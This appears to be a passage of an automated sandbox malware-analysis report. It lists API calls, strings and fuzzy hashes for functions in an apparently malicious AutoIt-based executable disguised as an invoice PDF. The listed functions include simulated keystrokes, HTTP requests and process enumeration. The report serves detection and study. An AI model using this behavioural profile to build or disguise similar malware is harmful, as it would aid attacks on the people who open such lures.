                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                              • Instruction ID: b1e2397247e50d0c7000acf5a2db8631a214b417b603bec0598d849dd48054e0
                                                                              • Opcode Fuzzy Hash: 2697ea5a26a9fc7488a3d070abad83f7d669ddccf749f4bfc66ff3ac1f4b4023
                                                                              • Instruction Fuzzy Hash: E54128332402806BE320A75DB8C4ABBFB98E7A2362F50443FF18196520D76678C5D339
                                                                              APIs
                                                                                • Part of subcall function 0044593E: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 0044595D
                                                                                • Part of subcall function 0044593E: GetCurrentThreadId.KERNEL32 ref: 00445964
                                                                                • Part of subcall function 0044593E: AttachThreadInput.USER32(00000000,?,00000001,00478FA7), ref: 0044596B
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D15
                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00445D35
                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00445D3F
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D45
                                                                              • PostMessageW.USER32(00000000,00000100,00000027,00000000), ref: 00445D66
                                                                              • Sleep.KERNEL32(00000000), ref: 00445D70
                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00445D76
                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00445D8B
                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000), ref: 00445D8F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                              • String ID:
                                                                              • API String ID: 2014098862-0
                                                                              • Opcode ID: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                              • Instruction ID: b085f3065cf9cd100f04f322da00d4b037e108fc79bf5967fdabce1cd6d2e74b
                                                                              • Opcode Fuzzy Hash: 621277f82d70151dd5f553487d646ea3797e8fa9e9e6e4ab5ab83039983e6254
                                                                              • Instruction Fuzzy Hash: 7B116971790704B7F620AB958C8AF5A7399EF88B11F20080DF790AB1C1C9F5E4418B7C
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc_malloc$_strcat_strlen
                                                                              • String ID: AU3_FreeVar
                                                                              • API String ID: 2184576858-771828931
                                                                              • Opcode ID: 26aaff5e082ca497ce4300f4f3693add94fee8bb222c26822f07fce8af8e1d01
                                                                              • Instruction ID: c940ad03d776ce5ee908f8b881b33357b51647545ffc53e819ca791e1fdac2da
                                                                              • Opcode Fuzzy Hash: 26aaff5e082ca497ce4300f4f3693add94fee8bb222c26822f07fce8af8e1d01
                                                                              • Instruction Fuzzy Hash: EDA18DB5604205DFC300DF59C480A2AB7E5FFC8319F1489AEE9554B362D739ED89CB8A
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                              • DestroyWindow.USER32(?), ref: 0042A751
                                                                              • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                              • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 4174999648-3243417748
                                                                              • Opcode ID: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                              • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                              • Opcode Fuzzy Hash: 9f9deb73285226e6ba240568d142da5fec9cf520cd27fc9a3a2cacaca98377aa
                                                                              • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0044AA5A
                                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0044AA8D
                                                                              • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0044AAF9
                                                                              • InternetSetOptionW.WININET(00000000,0000001F,?,00000004), ref: 0044AB11
                                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044AB20
                                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,00000000,00000000), ref: 0044AB61
                                                                                • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: HttpInternet$OptionQueryRequest$ConnectErrorInfoLastOpenSend
                                                                              • String ID:
                                                                              • API String ID: 1291720006-3916222277
                                                                              • Opcode ID: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                              • Instruction ID: 782b6278bf246bef60821ca34847c3ce69a0d92f774604c9678bedd135ce19ea
                                                                              • Opcode Fuzzy Hash: fd0d9a71f1b9f9aed2e07c44adb1cce69882d59a8a6dee97d1abd644e851efd9
                                                                              • Instruction Fuzzy Hash: 9C51E6B12803016BF320EB65CD85FBBB7A8FB89704F00091EF74196181D7B9A548C76A
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastselect
                                                                              • String ID: HH
                                                                              • API String ID: 215497628-2761332787
                                                                              • Opcode ID: 079df80a31b5df2535847370fb433b4e83dedb888dcd9b6996cc0defb77da8f7
                                                                              • Instruction ID: a252b81ccbce03d1e7b1b0efababa2c0a0929072778302a7b1202b90a7697d70
                                                                              • Opcode Fuzzy Hash: 079df80a31b5df2535847370fb433b4e83dedb888dcd9b6996cc0defb77da8f7
                                                                              • Instruction Fuzzy Hash: BF51E4726043005BD320EB65DC42F9BB399EB94324F044A2EF558E7281EB79E944C7AA
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __snwprintf__wcsicoll_wcscpy
                                                                              • String ID: , $$0vH$AUTOITCALLVARIABLE%d$CALLARGARRAY
                                                                              • API String ID: 1729044348-3708979750
                                                                              • Opcode ID: b14adaf20eb80a96f6c264873c45223fdf2ebdf4651fb7c4a25b18bb92b0e92c
                                                                              • Instruction ID: 823d0c4529048d9f890bbf28e75db1a658c609af9319d28fcdda535ef0d13f31
                                                                              • Opcode Fuzzy Hash: b14adaf20eb80a96f6c264873c45223fdf2ebdf4651fb7c4a25b18bb92b0e92c
                                                                              • Instruction Fuzzy Hash: E651A571514300ABD610EF65C882ADFB3A4EFC4348F048D2FF54967291D779E949CBAA
                                                                              APIs
                                                                                • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,?,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,004A8E80,C:\Users\user\Desktop\Outstanding Invoices Spreadsheet Scan 00495_PDF.exe,0040F3D2), ref: 0040FFCA
                                                                              • lstrcmpiW.KERNEL32(?,?), ref: 0044BC04
                                                                              • MoveFileW.KERNEL32(?,?), ref: 0044BC38
                                                                              • _wcscat.LIBCMT ref: 0044BCAA
                                                                              • _wcslen.LIBCMT ref: 0044BCB7
                                                                              • _wcslen.LIBCMT ref: 0044BCCB
                                                                              • SHFileOperationW.SHELL32 ref: 0044BD16
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                              • String ID: \*.*
                                                                              • API String ID: 2326526234-1173974218
                                                                              • Opcode ID: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                              • Instruction ID: 9e4979448571685848097db6772507fbfe8bfb8d1337cd0032b1ea927bdad9db
                                                                              • Opcode Fuzzy Hash: 79917c867e5dc746cbfe3ebb0135d92afbab4952e7fca4f485a184e9ce72b521
                                                                              • Instruction Fuzzy Hash: 4B3183B14083019AD724EF21C5D5ADFB3E4EFC8304F444D6EB98993251EB39E608D7AA
                                                                              APIs
                                                                                • Part of subcall function 00436328: _wcsncpy.LIBCMT ref: 0043633C
                                                                              • _wcslen.LIBCMT ref: 004366DD
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00436700
                                                                              • GetLastError.KERNEL32 ref: 0043670F
                                                                              • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00436727
                                                                              • _wcsrchr.LIBCMT ref: 0043674C
                                                                                • Part of subcall function 004366BE: CreateDirectoryW.KERNEL32(?,00000000,?,00000000,00000000), ref: 0043678F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                              • String ID: \
                                                                              • API String ID: 321622961-2967466578
                                                                              • Opcode ID: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                              • Instruction ID: 68cadaa88695c7c006562ade17844284f7fc34f8e7e15af3b97584e331f528d6
                                                                              • Opcode Fuzzy Hash: 1eb455b432650c328f353f4bd1bc621d200bc06401c5471b489e88a9126e4646
                                                                              • Instruction Fuzzy Hash: 3C2148765003017ADB20A724EC47AFF33989F95764F90993EFD14D6281E779950882AE
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: __wcsnicmp
                                                                              • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                              • API String ID: 1038674560-2734436370
                                                                              • Opcode ID: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                              • Instruction ID: f72ce1d64a5a3b865947b719243e4701f1ba8c8209579f194a7ae3ad15c73224
                                                                              • Opcode Fuzzy Hash: 8fabdde956d602f6b8b7368bcff20dfc7d0b0c72369e2d81c3549115c9808aba
                                                                              • Instruction Fuzzy Hash: 1B21F87261161067E730B659DCC2BDB63985F65305F04406BF800AA247D6ADA98A83AA
                                                                              APIs
                                                                              • EnumProcesses.PSAPI(?,00000800,?,?,00444263,?,?,?), ref: 00436EEC
                                                                              • OpenProcess.KERNEL32(00000410,00000000,?,?,?), ref: 00436F44
                                                                              • EnumProcessModules.PSAPI(00000000,?,00000004,?), ref: 00436F59
                                                                              • GetModuleBaseNameW.PSAPI(00000000,?,?,00000104,00000000,?,00000004,?), ref: 00436F71
                                                                              • __wsplitpath.LIBCMT ref: 00436FA0
                                                                              • _wcscat.LIBCMT ref: 00436FB2
                                                                              • __wcsicoll.LIBCMT ref: 00436FC4
                                                                              • CloseHandle.KERNEL32(00000000,00000000,?,?,00000104,00000000,?,00000004,?), ref: 00437003
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: EnumProcess$BaseCloseHandleModuleModulesNameOpenProcesses__wcsicoll__wsplitpath_wcscat
                                                                              • String ID:
                                                                              • API String ID: 2903788889-0
                                                                              • Opcode ID: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                              • Instruction ID: e95795bff0e4a6f47310c77509a1ee8dff79588992f1933afd8058d7896a4498
                                                                              • Opcode Fuzzy Hash: 7292045517b03260f1320f87d3cebc28a29f897dca793e666df8b3a842c294cc
                                                                              • Instruction Fuzzy Hash: C831A5B5108341ABD725DF54D881EEF73E8BBC8704F00891EF6C587241DBB9AA89C766
                                                                              APIs
                                                                              • DeleteObject.GDI32(?), ref: 0044157D
                                                                              • GetDC.USER32(00000000), ref: 00441585
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00441590
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044159B
                                                                              • CreateFontW.GDI32(?,00000000,00000000,00000000,?,000000FF,000000FF,000000FF,00000001,00000004,00000000,?,00000000,00000000), ref: 004415E9
                                                                              • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00441601
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00441639
                                                                              • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00441659
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                              • String ID:
                                                                              • API String ID: 3864802216-0
                                                                              • Opcode ID: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                              • Instruction ID: 4e191e68d33858d232da06d8f8bca50b2e2c885119a5133d865ec5329e905ca2
                                                                              • Opcode Fuzzy Hash: ea0a3e179a2db4f205f3d0bf310cedd64f619745dcd59731a2847991c922bb1b
                                                                              • Instruction Fuzzy Hash: 1531C172240344BBE7208B14CD49FAB77EDEB88B15F08450DFB44AA2D1DAB4ED808B64
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 00401257
                                                                                • Part of subcall function 00401BE0: _memset.LIBCMT ref: 00401C62
                                                                                • Part of subcall function 00401BE0: _wcsncpy.LIBCMT ref: 00401CA1
                                                                                • Part of subcall function 00401BE0: _wcscpy.LIBCMT ref: 00401CBD
                                                                                • Part of subcall function 00401BE0: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401CCF
                                                                              • KillTimer.USER32(?,?), ref: 004012B0
                                                                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012BF
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AA80
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AACC
                                                                              • Shell_NotifyIconW.SHELL32(?,?), ref: 0042AB0F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_$Timer_memset$Kill_wcscpy_wcsncpy
                                                                              • String ID:
                                                                              • API String ID: 1792922140-0
                                                                              • Opcode ID: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                              • Instruction ID: 78dbdb20408675f5dda5a176dd8a03fc230073daf987e80dd157250a536ae6f7
                                                                              • Opcode Fuzzy Hash: 91f47cbc1f218a7f09512ea68bd6b482f011e20e77652f43937312b7b91c0350
                                                                              • Instruction Fuzzy Hash: 56319670609642BFD319CB24D544B9BFBE8BF85304F04856EF488A3251C7789A19D7AB
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                              • ExitThread.KERNEL32 ref: 0041410F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                              • __freefls@4.LIBCMT ref: 00414135
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                                                              • String ID:
                                                                              • API String ID: 1925773019-0
                                                                              • Opcode ID: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                              • Instruction ID: d0499dd1a11a7aa3f5f6b81cdb2be0183561266298d4129ec5ef95b8f2f1ff50
                                                                              • Opcode Fuzzy Hash: 78c5a7e04feddb60afef3bdf2204f5ea6d2fca564e255d6fa6df859771c1ea47
                                                                              • Instruction Fuzzy Hash: 12018430000200ABC704BFB2DD0D9DE7BA9AF95345722886EF90497212DA3CC9C28B5C
                                                                              APIs
                                                                              • VariantClear.OLEAUT32(00000038), ref: 004357C3
                                                                              • VariantClear.OLEAUT32(00000058), ref: 004357C9
                                                                              • VariantClear.OLEAUT32(00000068), ref: 004357CF
                                                                              • VariantClear.OLEAUT32(00000078), ref: 004357D5
                                                                              • VariantClear.OLEAUT32(00000088), ref: 004357DE
                                                                              • VariantClear.OLEAUT32(00000048), ref: 004357E4
                                                                              • VariantClear.OLEAUT32(00000098), ref: 004357ED
                                                                              • VariantClear.OLEAUT32(000000A8), ref: 004357F6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                              • Instruction ID: 4669651a97e20320d925a323ac357da1b1419afffb7c9eb93274aad60c959a81
                                                                              • Opcode Fuzzy Hash: 108e33c2045b04221b4df3f02cd388125a51a7e0134505e60bdc817f2fb2f336
                                                                              • Instruction Fuzzy Hash: BDF03CB6400B446AC235EB79DC40BD7B7E86F89200F018E1DE58783514DA78F588CB64
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00464ADE
